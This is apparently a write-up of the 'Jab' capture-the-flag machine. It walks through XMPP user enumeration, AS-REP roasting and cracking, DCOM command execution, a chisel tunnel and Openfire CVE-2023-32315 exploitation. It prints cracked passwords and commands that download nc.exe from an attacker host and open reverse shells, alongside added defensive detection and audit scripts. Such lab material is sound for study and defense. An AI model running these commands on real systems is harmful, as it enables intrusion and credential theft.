Jab
OS: Windows
Difficulty: Medium
Points: 30
Nmap
nmap -v -p 22,8080 -sV -sC -oN nmap.txt 10.10.11.7
Nmap scan report for 10.10.11.4
Host is up (0.095s latency).
Not shown: 65499 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-11 11:43:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Issuer: commonName=jab-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-11-01T20:16:18
| Not valid after: 2024-10-31T20:16:18
| MD5: 40f9:01d6:610b:2892:43ca:77de:c48d:f221
|_SHA-1: 66ea:c22b:e584:ab5e:07e3:aa8f:5af2:b634:0733:8c06
|_ssl-date: 2024-04-11T11:45:07+00:00; 0s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-11T11:45:06+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Issuer: commonName=jab-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-11-01T20:16:18
| Not valid after: 2024-10-31T20:16:18
| MD5: 40f9:01d6:610b:2892:43ca:77de:c48d:f221
|_SHA-1: 66ea:c22b:e584:ab5e:07e3:aa8f:5af2:b634:0733:8c06
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-11T11:45:07+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Issuer: commonName=jab-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-11-01T20:16:18
| Not valid after: 2024-10-31T20:16:18
| MD5: 40f9:01d6:610b:2892:43ca:77de:c48d:f221
|_SHA-1: 66ea:c22b:e584:ab5e:07e3:aa8f:5af2:b634:0733:8c06
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Issuer: commonName=jab-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-11-01T20:16:18
| Not valid after: 2024-10-31T20:16:18
| MD5: 40f9:01d6:610b:2892:43ca:77de:c48d:f221
|_SHA-1: 66ea:c22b:e584:ab5e:07e3:aa8f:5af2:b634:0733:8c06
|_ssl-date: 2024-04-11T11:45:07+00:00; 0s from scanner time.
5222/tcp open jabber
|_ssl-date: TLS randomness does not represent time
| xmpp-info:
| STARTTLS Failed
| info:
| xmpp:
| version: 1.0
| capabilities:
| errors:
| invalid-namespace
| (timeout)
| auth_mechanisms:
| features:
| stream_id: 4f6t6n3tnc
| unknown:
|_ compression_methods:
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after: 2028-10-24T22:00:12
| MD5: 3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
5223/tcp open ssl/jabber
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after: 2028-10-24T22:00:12
| MD5: 3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
|_ssl-date: TLS randomness does not represent time
| xmpp-info:
| STARTTLS Failed
| info:
| xmpp:
| capabilities:
| auth_mechanisms:
| features:
| errors:
| (timeout)
| unknown:
|_ compression_methods:
5262/tcp open jabber
| fingerprint-strings:
| RPCCheck:
|_ <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5263/tcp open ssl/jabber
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after: 2028-10-24T22:00:12
| MD5: 3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
| xmpp-info:
| STARTTLS Failed
| info:
| xmpp:
| capabilities:
| auth_mechanisms:
| features:
| errors:
| (timeout)
| unknown:
|_ compression_methods:
5270/tcp open ssl/xmpp Wildfire XMPP Client
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after: 2028-10-24T22:00:12
| MD5: 3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
|_ssl-date: TLS randomness does not represent time
5275/tcp open jabber
| xmpp-info:
| STARTTLS Failed
| info:
| xmpp:
| version: 1.0
| capabilities:
| errors:
| invalid-namespace
| (timeout)
| auth_mechanisms:
| features:
| stream_id: a7l130js5g
| unknown:
|_ compression_methods:
5276/tcp open ssl/jabber
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after: 2028-10-24T22:00:12
| MD5: 3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7070/tcp open realserver?
7443/tcp open ssl/oracleas-https?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after: 2028-10-24T22:00:12
| MD5: 3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
7777/tcp open socks5 (No authentication; connection failed)
| socks-auth-info:
|_ No authentication
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49779/tcp open msrpc Microsoft Windows RPC
64318/tcp open msrpc Microsoft Windows RPC
Enumeration
Port 7070 is running the Openfire service.
If we follow the link on the web page we can get information about the technology in use.
BOSH was originally developed in the Jabber/XMPP community as a replacement for an even earlier HTTP-based technology called Jabber HTTP Polling (XEP-0025) [9]. Although BOSH assumes that the “payload” of HTTP requests and responses will be XML, the payload formats are not limited to XMPP stanzas (see XMPP Core [10]) and could contain a mixture of elements qualified by namespaces defined by different protocols (e.g., both XMPP and JSON). BOSH connection managers are generally not required to understand anything about the XML content that they transport beyond perhaps ensuring that each XML payload is qualified by the correct namespace.
XMPP Client
We need an XMPP client to connect to the server, so we will use Pidgin.
apt install pidgin
pidgin
Once we have the client we can register a user to get access.
We register our user and with that we are authenticated on the XMPP server.
XMPP Enumeration
Enumerating the server we find 2 rooms. The path to find them is the following:
Buddies -> Join a Chat -> Room List -> Find Rooms
After checking everything in detail we can only access test2, and it contains no relevant information; however, we can obtain a list of users. The catch is that they cannot be copied from the dialog, so we extract that information the following way.
Accounts -> Search for Users -> Search Directory
Search : *
Before pressing OK we open the debug console.
Help -> Debug Window
Now we press OK and see the whole query it makes in the console.
We save the output and process it as follows to keep only the usernames (sort -u instead of uniq, since uniq only drops adjacent duplicates).
cat purple-debug.log | sed 's/value>/\n/g' | cut -d '<' -f 1 | grep '@jab.htb' | cut -d '@' -f 1 | sort -u > users.txt
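The same extraction done by parsing the stanzas instead of cutting on value>. This is an added example, not part of the original writeup: it reads a constructed Pidgin debug excerpt (the real purple-debug.log is assumed to log each received stanza on one "Recv" line in the same way), parses the jabber:iq:search result form, and keeps only the jid fields, so a Name field that happens to contain @jab.htb is not mistaken for a user the way the grep pipeline would.

```python
import re
import xml.etree.ElementTree as ET

# Constructed excerpt of a Pidgin debug log (purple-debug.log). The format
# (one "Recv" line per received stanza) is assumed; the usernames are the ones
# the writeup lists, the display names are placeholders.
SAMPLE_LOG = """\
(11:52:03) jabber: Sending (ssl) (me@jab.htb/pidgin): <iq type='set' id='purple1'><query xmlns='jabber:iq:search'><x xmlns='jabber:x:data' type='submit'><field var='search'><value>*</value></field></x></query></iq>
(11:52:04) jabber: Recv (ssl)(1480): <iq type='result' id='purple1' to='me@jab.htb/pidgin'><query xmlns='jabber:iq:search'><x xmlns='jabber:x:data' type='result'><reported><field var='jid' label='JID' type='text-single'/><field var='Name' label='Name' type='text-single'/></reported><item><field var='jid'><value>jmontgomery@jab.htb</value></field><field var='Name'><value>User One</value></field></item><item><field var='jid'><value>lbradford@jab.htb</value></field><field var='Name'><value>support@jab.htb mailbox</value></field></item><item><field var='jid'><value>mlowe@jab.htb</value></field><field var='Name'><value>User Three</value></field></item><item><field var='jid'><value>jmontgomery@jab.htb</value></field><field var='Name'><value>User One</value></field></item></x></query></iq>
(11:52:04) jabber: Recv (ssl)(62): <iq type='result' id='purple2' to='me@jab.htb/pidgin'><query xmlns='jabber:iq:roster'/></iq>
"""

NS_DATA = "{jabber:x:data}"          # XEP-0004 data forms namespace used by the search result
STANZA_RE = re.compile(r"(<iq\b.*?</iq>)")


def search_result_jids(log_text):
    """Return the jid field of every item in every received search result, in log order."""
    jids = []
    for line in log_text.splitlines():
        if "Recv" not in line:          # only stanzas the server sent us
            continue
        for stanza in STANZA_RE.findall(line):
            try:
                root = ET.fromstring(stanza)
            except ET.ParseError:
                continue                # truncated or interleaved stanza; skip it
            if root.get("type") != "result":
                continue
            for item in root.iter(NS_DATA + "item"):
                for field in item.findall(NS_DATA + "field"):
                    if field.get("var") != "jid":
                        continue        # ignore Name/Email/... fields entirely
                    value = field.find(NS_DATA + "value")
                    if value is not None and value.text:
                        jids.append(value.text.strip())
    return jids


def extract_users(log_text, domain="jab.htb"):
    """Unique local parts of the JIDs in the given domain, first-seen order."""
    seen = []
    for jid in search_result_jids(log_text):
        local, _, host = jid.rpartition("@")
        if host.lower() == domain.lower() and local and local not in seen:
            seen.append(local)
    return seen


if __name__ == "__main__":
    for user in extract_users(SAMPLE_LOG):
        print(user)
```

With the sample above the text pipeline would also emit "support" (taken from a Name value), while the parser returns only the three real accounts.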
ASREPRoast
With the user list we can try to obtain hashes via Kerberos.
impacket-GetNPUsers -usersfile users.txt jab.htb/ -dc-ip 10.10.11.4
After a few minutes we obtained 3 hashes for the users.
jmontgomery
lbradford
mlowe
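What the three hashes mean on the defender's side: each of those accounts has the "Do not require Kerberos preauthentication" flag set, so the KDC hands out an AS-REP encrypted with the user's RC4 key to anyone who asks. The following is an added example, not from the writeup, with constructed directory records and constructed Event ID 4768 entries: the first function audits userAccountControl for the flag, the second groups no-preauth RC4 TGT requests by source address, which is the pattern GetNPUsers leaves in the Security log.

```python
# userAccountControl bit: Kerberos pre-authentication not required (UF_DONT_REQUIRE_PREAUTH)
UF_DONT_REQUIRE_PREAUTH = 0x400000
# Kerberos etype 23 (RC4-HMAC); the cracked hash above is tagged $krb5asrep$23$ for this reason
RC4_HMAC = 0x17

# Constructed directory records; only the account names come from the writeup.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "jmontgomery", "userAccountControl": 0x400200},   # NORMAL_ACCOUNT | DONT_REQ_PREAUTH
    {"sAMAccountName": "lbradford",   "userAccountControl": 0x400200},
    {"sAMAccountName": "mlowe",       "userAccountControl": 0x400200},
    {"sAMAccountName": "svc_openfire", "userAccountControl": 0x10200},   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
]

# Constructed Event ID 4768 (A Kerberos authentication ticket (TGT) was requested) records.
# PreAuthType 0 means "logon without pre-authentication"; 2 is the normal encrypted-timestamp path.
SAMPLE_4768 = [
    {"TargetUserName": "jmontgomery", "IpAddress": "::ffff:10.10.14.105", "PreAuthType": 0, "TicketEncryptionType": 0x17},
    {"TargetUserName": "lbradford",   "IpAddress": "::ffff:10.10.14.105", "PreAuthType": 0, "TicketEncryptionType": 0x17},
    {"TargetUserName": "mlowe",       "IpAddress": "::ffff:10.10.14.105", "PreAuthType": 0, "TicketEncryptionType": 0x17},
    {"TargetUserName": "svc_openfire", "IpAddress": "::ffff:10.10.11.50", "PreAuthType": 2, "TicketEncryptionType": 0x12},
]


def roastable_accounts(accounts):
    """Accounts whose userAccountControl has pre-authentication disabled."""
    return sorted(a["sAMAccountName"] for a in accounts
                  if a["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH)


def asrep_roast_alerts(events, min_distinct_users=2):
    """Source addresses that requested RC4 TGTs without pre-auth for several different accounts."""
    by_source = {}
    for e in events:
        if e["PreAuthType"] == 0 and e["TicketEncryptionType"] == RC4_HMAC:
            by_source.setdefault(e["IpAddress"], set()).add(e["TargetUserName"])
    return {src: sorted(users) for src, users in by_source.items()
            if len(users) >= min_distinct_users}


if __name__ == "__main__":
    print("pre-auth disabled:", roastable_accounts(SAMPLE_ACCOUNTS))
    print("roasting sources:", asrep_roast_alerts(SAMPLE_4768))
```

The fix is to clear the flag on those accounts (or justify why a legacy client needs it) and to disable RC4 for them; with AES-only keys the same request yields a PBKDF2-based etype 17/18 hash that is far slower to crack than the etype 23 one john broke in 13 seconds above.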
Crack Hash
Using john we could only obtain the password for one of the hashes.
┌──(root㉿kali)-[~/htb/Jab]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 ASIMD 4x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Midnight_121 ($krb5asrep$23$jmontgomery@JAB.HTB)
1g 0:00:00:13 DONE (2024-04-11 07:00) 0.07315g/s 1049Kp/s 2890Kc/s 2890KC/s !SkicA!..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We use that username and password to connect via XMPP and find more credentials.
svc_openfire : !@#$%^&*(1qazxsw
Bloodhound Enumeration
We enumerate Active Directory with BloodHound to analyze it afterwards.
┌──(root㉿kali)-[~/htb/Jab]
└─# python3 /opt/BloodHound.py/bloodhound.py -c all -u 'svc_openfire' -p '!@#$%^&*(1qazxsw' -d jab.htb -dc DC01.jab.htb -ns 10.10.11.4
INFO: Found AD domain: jab.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (DC01.jab.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: DC01.jab.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 502 computers
INFO: Connecting to LDAP server: DC01.jab.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 2687 users
INFO: Found 162 groups
INFO: Found 2 gpos
INFO: Found 21 ous
INFO: Found 19 containers
INFO: Found 0 trusts
Analyzing the privileges the svc_openfire user has, we can see it has ExecuteDCOM privileges over the domain controller.
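The same finding pulled straight from the collected data rather than from the graph UI. This is an added example, not part of the writeup or of BloodHound: it walks constructed fragments shaped like the computers.json and users.json that bloodhound.py writes (the layout of the DcomUsers / LocalAdmins blocks is assumed from that format; SIDs and names are placeholders) and reports every principal that holds DCOM access on a host without also being a local administrator there, which is exactly the case worth reviewing, since a local admin would have that access anyway.

```python
# Constructed fragments in the shape of bloodhound.py's users.json / computers.json.
# The "Results" lists under LocalAdmins and DcomUsers are assumed to follow that format.
SAMPLE_USERS = {"data": [
    {"ObjectIdentifier": "S-1-5-21-0-0-0-1105", "Properties": {"name": "SVC_OPENFIRE@JAB.HTB"}},
    {"ObjectIdentifier": "S-1-5-21-0-0-0-500",  "Properties": {"name": "ADMINISTRATOR@JAB.HTB"}},
]}

SAMPLE_COMPUTERS = {"data": [
    {
        "ObjectIdentifier": "S-1-5-21-0-0-0-1000",
        "Properties": {"name": "DC01.JAB.HTB"},
        "LocalAdmins": {"Collected": True, "FailureReason": None, "Results": [
            {"ObjectIdentifier": "S-1-5-21-0-0-0-500", "ObjectType": "User"},
        ]},
        "DcomUsers": {"Collected": True, "FailureReason": None, "Results": [
            {"ObjectIdentifier": "S-1-5-21-0-0-0-500",  "ObjectType": "User"},
            {"ObjectIdentifier": "S-1-5-21-0-0-0-1105", "ObjectType": "User"},
        ]},
    },
    {
        "ObjectIdentifier": "S-1-5-21-0-0-0-1001",
        "Properties": {"name": "WS01.JAB.HTB"},
        "LocalAdmins": {"Collected": False, "FailureReason": "timeout", "Results": []},
        "DcomUsers": {"Collected": False, "FailureReason": "timeout", "Results": []},
    },
]}


def build_sid_map(*collections):
    """SID -> display name for every object in the given collections."""
    names = {}
    for coll in collections:
        for obj in coll["data"]:
            names[obj["ObjectIdentifier"]] = obj["Properties"]["name"]
    return names


def _results(computer, key):
    block = computer.get(key) or {}
    return block.get("Results") or []


def dcom_without_admin(computers, names):
    """Sorted (principal, host) pairs: DCOM access on the host without local-admin rights there."""
    findings = []
    for comp in computers["data"]:
        if not comp.get("DcomUsers", {}).get("Collected"):
            continue                      # no data for this host; do not report a false negative as clean
        host = comp["Properties"]["name"]
        admins = {r["ObjectIdentifier"] for r in _results(comp, "LocalAdmins")}
        for r in _results(comp, "DcomUsers"):
            sid = r["ObjectIdentifier"]
            if sid not in admins:
                findings.append((names.get(sid, sid), host))
    return sorted(findings)


def uncollected_hosts(computers):
    """Hosts whose DCOM membership could not be collected, so the audit above says nothing about them."""
    return sorted(c["Properties"]["name"] for c in computers["data"]
                  if not c.get("DcomUsers", {}).get("Collected"))


if __name__ == "__main__":
    names = build_sid_map(SAMPLE_USERS, SAMPLE_COMPUTERS)
    print(dcom_without_admin(SAMPLE_COMPUTERS, names))
    print("not collected:", uncollected_hosts(SAMPLE_COMPUTERS))
```

A service account that only needs to run the XMPP server has no business with remote DCOM activation on the domain controller; removing it from whatever local group grants that right closes the path used in the next section.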
DCOM Exec
Researching DCOM we came across several blogs.
https://simondotsh.com/infosec/2021/12/29/dcom-without-admin.html
https://www.ired.team/offensive-security/lateral-movement/t1175-distributed-component-object-model
https://wadcoms.github.io/wadcoms/Impacket-DCOMExec/
We can obtain RCE the following way.
impacket-dcomexec svc_openfire@10.10.11.4 'ping -n 1 10.10.14.105' -object MMC20 -nooutput
We obtain a reverse shell.
# Copy nc.exe
cp /usr/share/windows-resources/binaries/nc.exe .
# Start the web server
python3 -m http.server 80
# Run the commands to get the reverse shell
impacket-dcomexec 'svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'mkdir c:\temp' -object MMC20 -nooutput
impacket-dcomexec 'svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'curl 10.10.14.105/nc.exe -o c:\temp\nc.exe' -object MMC20 -nooutput
impacket-dcomexec 'svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'c:\temp\nc.exe 10.10.14.105 1234 -e cmd.exe' -object MMC20 -nooutput
┌──(root㉿kali)-[~/htb/Jab]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.105] from (UNKNOWN) [10.10.11.4] 50235
Microsoft Windows [Version 10.0.17763.5458]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\windows\system32>whoami
whoami
jab\svc_openfire
Privilege Escalation
Now that we are inside the machine we identify a couple of local open ports related to Openfire.
C:\windows\system32>netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 127.0.0.1:53 0.0.0.0:0 LISTENING 2620
TCP 127.0.0.1:389 127.0.0.1:49773 ESTABLISHED 644
TCP 127.0.0.1:9090 0.0.0.0:0 LISTENING 1268
TCP 127.0.0.1:9091 0.0.0.0:0 LISTENING 1268
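A small parser for that netstat -ano listing, added here as an example and not part of the writeup. It runs over a constructed copy of the output above (PIDs and ports are sample values) and answers the two questions that matter at this point: which ports are bound to loopback only, and which network-facing ports belong to the same PID, which is how you tell that 9090/9091 are the admin console of the same process that serves XMPP on 5222 and 7070.

```python
# Constructed netstat -ano output modelled on the listing above; PIDs and ports are sample values.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:5222           0.0.0.0:0              LISTENING       1268
  TCP    0.0.0.0:7070           0.0.0.0:0              LISTENING       1268
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       2620
  TCP    127.0.0.1:389          127.0.0.1:49773        ESTABLISHED     644
  TCP    127.0.0.1:9090         0.0.0.0:0              LISTENING       1268
  TCP    127.0.0.1:9091         0.0.0.0:0              LISTENING       1268
  TCP    [::1]:9090             [::]:0                 LISTENING       1268
  UDP    0.0.0.0:123            *:*                                    1092
"""


def parse_listeners(text):
    """(pid, host, port) for every TCP socket in LISTENING state; UDP and established sockets are skipped."""
    out = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0] != "TCP" or parts[3] != "LISTENING":
            continue
        host, _, port = parts[1].rpartition(":")   # rpartition keeps IPv6 "[::1]" intact
        out.append((parts[4], host, int(port)))
    return out


def is_loopback(host):
    return host.startswith("127.") or host == "[::1]"


def loopback_only_listeners(text):
    """Ports per PID bound to loopback only, i.e. reachable from outside solely through a port forward."""
    bound = {}
    for pid, host, port in parse_listeners(text):
        bound.setdefault((pid, port), set()).add(host)
    result = {}
    for (pid, port), hosts in bound.items():
        if all(is_loopback(h) for h in hosts):
            result.setdefault(pid, set()).add(port)
    return {pid: sorted(ports) for pid, ports in result.items()}


def exposed_ports_for_pid(text, pid):
    """Network-facing listening ports of a PID: identifies the service that owns the local-only ones."""
    return sorted({port for p, host, port in parse_listeners(text)
                   if p == pid and not is_loopback(host)})


if __name__ == "__main__":
    local = loopback_only_listeners(SAMPLE_NETSTAT)
    for pid, ports in sorted(local.items()):
        print(pid, "loopback-only:", ports, "exposed:", exposed_ports_for_pid(SAMPLE_NETSTAT, pid))
```

Binding the console to 127.0.0.1 is the right default, but it only helps while nobody can run a tunnel on the box; once a low-privileged shell exists, as it does here, the console is one chisel command away and its own authentication becomes the only control left.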
Port Forwarding
We will set up a port forward with chisel to reach that port. First we download the binary onto the machine.
python3 -m http.server 80
curl 10.10.14.105/chisel.exe -o c:\temp\chisel.exe
We create the tunnel the following way (R:9090:127.0.0.1:9090 makes the server side listen on 9090 and relay it to the target's loopback 9090).
┌──(root㉿kali)-[~/htb/Jab]
└─# /opt/linux/chisel server -p 5555 --reverse
2024/04/12 01:10:05 server: Reverse tunnelling enabled
2024/04/12 01:10:05 server: Fingerprint RwtpW0NzHQeIOhAYQTZz7Q8soOlr7aawPPFHw9pkx4I=
2024/04/12 01:10:05 server: Listening on http://0.0.0.0:5555
c:\temp>chisel.exe client 10.10.14.105:5555 R:9090:127.0.0.1:9090
chisel.exe client 10.10.14.105:5555 R:9090:127.0.0.1:9090
2024/04/12 04:11:13 client: Connecting to ws://10.10.14.105:5555
2024/04/12 04:11:13 client: Connected (Latency 101.4635ms)
Now we can access the portal.
Openfire Remote Code Execution
Using the svc_openfire user's credentials we can access the portal.
In our initial research on Openfire we identified that we can obtain RCE, as the following resources describe.
https://github.com/miko550/CVE-2023-32315
https://vulncheck.com/blog/openfire-cve-2023-32315
https://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT
First we download the openfire-management-tool-plugin.jar plugin and upload it in the Plugins section.
Once the plugin is uploaded we go to Server Settings and select the Management Tool option.
It will ask for a password, which is 123, and we get in. Then we select the system command option to execute commands.
We obtain a reverse shell and finish.
c:\temp\nc.exe 10.10.14.105 4444 -e cmd.exe